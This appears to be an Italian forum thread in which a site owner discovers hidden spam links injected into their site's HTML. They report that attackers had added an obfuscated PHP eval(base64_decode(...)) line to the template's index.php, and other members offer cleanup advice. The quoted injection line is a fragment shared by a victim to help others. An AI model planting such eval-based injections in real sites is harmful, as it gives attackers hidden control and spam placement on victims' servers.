[RISOLTO] Codice "strano" nell'html del sito...

[gerale01]

Scusatemi, non so se è il posto giusto dove postare il messaggio però ho bisogno di aiuto. Guardando l'html del mio sito ho trovato in fondo del codice non inserito da me, che ha dei link a delle pagine ***... si trova proprio in fondo ed è :
<u style="display: none">   </body>

</html><!-- 1198735876 -->


Qualcuno ha qualche idea sul come toglierlo...

Grazie
----------------------------------------------------
Risposta: Degli Hacker mi avevano modificato il file index.php del template inserendomi una riga che richiamava gli indirizzi esterni. La riga in questione era la seguente:

echo eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2Rl="));?>

Spero che possa essere di aiuto a qualche altro sventurato.

P.S. Ho finalmente letto tutti i post della sicurezza e ho blindato il sito... fatelo

[surfbit]

Prima dovresti capire chi l'ha messo 

[gerale01]

Mi viene da pensare ad un componente/modulo/mambot "fallato" ed infatti li sto controllando tutti, disinstallando quelli non più  utilizzati. Quello che chiedevo era sapere se ci potesse essere qualche shortcut per velocizzare la ricerca dell'elemento incriminato senza scorrere tutti i codici. Ho trovato un altro post (utilissimo..) che riporta ad una pagina dove sono indicati  i componenti da controllare per primi. Comunque grazie lo stesso... Solo un consiglio: pensate che mi convenga comunque denunciare il fatto alla polizia postale o è esagerato

[surfbit]

Mi viene da pensare ad un componente/modulo/mambot "fallato" ed infatti li sto controllando tutti, disinstallando quelli non più  utilizzati. Quello che chiedevo era sapere se ci potesse essere qualche shortcut per velocizzare la ricerca dell'elemento incriminato senza scorrere tutti i codici. Ho trovato un altro post (utilissimo..) che riporta ad una pagina dove sono indicati  i componenti da controllare per primi. Comunque grazie lo stesso... Solo un consiglio: pensate che mi convenga comunque denunciare il fatto alla polizia postale o è esagerato

Per primo consiglio ti direi di tirare sù un back-up recente prima del fatto e cambiare tutte le pass. Per la denuncia dipende, sicuramente se si tratta di link illegali ci potrebbe stare.

[gerale01]

Purtroppo non so a quando risalga il fatto (quindi il backup lo scarterei), io me ne sono accorto solo in questi giorni spulciando l'html del sito. Per quanto riguarda i link mi sembrano del tutto illegali (nel senso che si riferiscono a pagine non corrette su siti legali). Se vuoi dare uno sguardo anche te il sito è http://www.progress.it.